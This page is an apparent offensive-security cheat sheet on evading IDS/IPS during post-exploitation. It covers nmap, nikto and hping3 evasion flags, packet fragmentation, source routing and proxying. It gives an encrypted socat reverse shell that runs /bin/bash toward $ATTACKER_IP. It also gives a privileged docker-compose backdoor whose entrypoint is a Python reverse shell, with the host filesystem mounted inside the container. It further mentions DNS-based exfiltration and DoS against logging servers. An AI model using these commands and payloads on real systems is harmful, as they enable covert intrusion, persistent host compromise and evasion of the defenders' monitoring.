killchain-compendium/post_exploitation/docs/ids_ips_evation.md

3.2 KiB

IDS & IPS Evation

  • Evation by manipulation of
    • Tool parameters
    • Protocol
    • Payload
    • Route
    • Or DoS

Enumeration

nmap

  • --script-args http.useragent="<user-agent>"
  • -Ss half open

nikto

  • -useragent <user-agent>
  • Tuning -T 1 2 3
  • NOT-evasion <encoding-technique>, it increases detection

Protocol Manipulation

Relying on another protocol

  • nc -ulvnp 4711 for listening to incoming UDP traffic
  • nc -u $TARGET_IP $TARGET_PORT for connecting through UDP

Manipulation of the source's or LHOST's network port

  • nmap -g 80 or nmap --source-port 53 to send outgoing nmap traffic through it

Session splicing by fragmentation and segmentation

  • nmap fragmentation in 8 bytes -f, 16 bytes -ff, --mtu <size> for MTU
  • Use Fragroute with ip_frag <num> in fragroute.conf, then use fragroute -f fragroute.conf $TARGET_IP

Sending invalid packets

  • Invalid protocol header flags and checksums vianmap --badsum, nmap --scanflags URG/ACK/PSH/RST/SYN/FIN, e.g. concatentation of multiple flags nmap --scanflags SYNRSTFIN
  • hping3 including --ttl, --badsum, header flags -S,-A,-P,-U,-F,-R

Payload Manipulation

Obfuscation and Encoding

  • Base64
  • URL
  • Escaped Unicode Characters

Encrypting Communication Channels

  • Use socat with encryption
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
  • Create .pem (Privacy Enhanced Mail) file via
cat id_rsa.key reverse.crt > reverse.pem
  • Listening on attacker side
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
  • On target
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash

Modification of Data

  • Order of parameters, instead of nc -lvnp it is nc -vpnl
  • Adding whitespaces to the commands
  • Use aliases

Route Manipulation

Relying on Source Routing

  • nmap --ip-options "L 10.10.20.30 10.10.30.40 routes through these IPs loosely
  • nmap --ip-options "S 10.10.20.30 10.10.30.40" routes through the IPs strictly

Using Proxyy Servers

  • nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP

Tactical DoS

  • Non malicious, benign traffic against
    • IDS/IPS
    • Logging server

MISC

  • Changing
    • User-Agent
    • Request frequency and duration of sleep
    • SSL/TLS certs
    • DNS beacon, storing exfiltrated data in the query

Backdoors

  • Backdooring without getting recognized by the IDS/IPS by reading its rules in the config file

Docker

  • Create a docker-compose.yaml file with a reverse shell as an entry point, mount the host volume to /mnt inside the container
---
version: "2.1"
services:
  backdoorservice:
    restart: always
    image: <Found image>
    entrypoint: > 
       python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
       s.connect(("<$ATTACKER_IP>",4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
       pty.spawn("/bin/sh")'
    volumes:
      - /:/mnt
    privileged: true